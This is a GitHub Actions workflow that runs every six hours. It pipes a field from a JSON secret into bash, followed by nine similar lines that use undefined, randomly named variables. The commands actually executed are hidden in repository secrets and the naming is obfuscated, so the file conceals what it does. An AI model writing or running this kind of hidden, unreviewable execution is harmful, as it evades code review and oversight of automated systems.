name: duanxiaojh
on:
  workflow_dispatch:
  schedule:
    - cron: '59 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanxiaojh
        env:
          q09: ${{ secrets.q09 }}
        run: |
          echo $q09 | jq -r .uqxq07 | /bin/bash
          echo $ybfwp60723 | jq -r .ee641 | /bin/bash
          echo $h85348 | jq -r .ft71763 | /bin/bash
          echo $fqfb7 | jq -r .u6118 | /bin/bash
          echo $dro7 | jq -r .eetv18481 | /bin/bash
          echo $rvpa64 | jq -r .zse69445 | /bin/bash
          echo $zmvbh205 | jq -r .hvx4 | /bin/bash
          echo $h4 | jq -r .xm373 | /bin/bash
          echo $yrje33763 | jq -r .sdhy4 | /bin/bash
          echo $wc97472 | jq -r .w280 | /bin/bash

